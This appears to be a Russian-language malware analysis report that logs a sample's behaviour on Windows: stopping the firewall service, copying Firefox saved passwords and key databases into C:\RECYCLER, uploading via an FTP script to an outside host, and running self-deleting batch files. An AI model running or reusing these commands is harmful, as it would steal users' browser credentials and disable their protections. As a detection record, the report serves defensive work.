Техническая информация
- <SYSTEM32>\net1.exe start sharedaccess
- <SYSTEM32>\ftp.exe -n -s:C:\RECYCLER\vict.ftp
- <SYSTEM32>\cmd.exe /c ""%TEMP%\selfdel0.bat" "
- <SYSTEM32>\alg.exe
- <SYSTEM32>\net1.exe stop sharedaccess
- <SYSTEM32>\xcopy.exe "%APPDATA%\Mozilla\Firefox\signons*.txt" "C:\RECYCLER\Firefox\" /S
- <SYSTEM32>\cmd.exe /c ""%TEMP%\1.tmp\batfile.bat" "
- <SYSTEM32>\net.exe stop sharedaccess
- <SYSTEM32>\xcopy.exe "%APPDATA%\Mozilla\Firefox\*.db" "C:\RECYCLER\Firefox\" /S
- C:\RECYCLER\Firefox\Profiles\cwdgt0y8.default\secmod.db
- C:\RECYCLER\vict.ftp
- %TEMP%\selfdel0.bat
- %TEMP%\1.tmp\batfile.bat
- C:\RECYCLER\Firefox\Profiles\cwdgt0y8.default\cert8.db
- C:\RECYCLER\Firefox\Profiles\cwdgt0y8.default\key3.db
- C:\RECYCLER\Firefox\Profiles\cwdgt0y8.default\secmod.db
- %TEMP%\1.tmp\batfile.bat
- C:\RECYCLER\Firefox\Profiles\cwdgt0y8.default\cert8.db
- C:\RECYCLER\Firefox\Profiles\cwdgt0y8.default\key3.db
- 'ft#.iw-h.de':21
- 'localhost':1037
- DNS ASK ft#.iw-h.de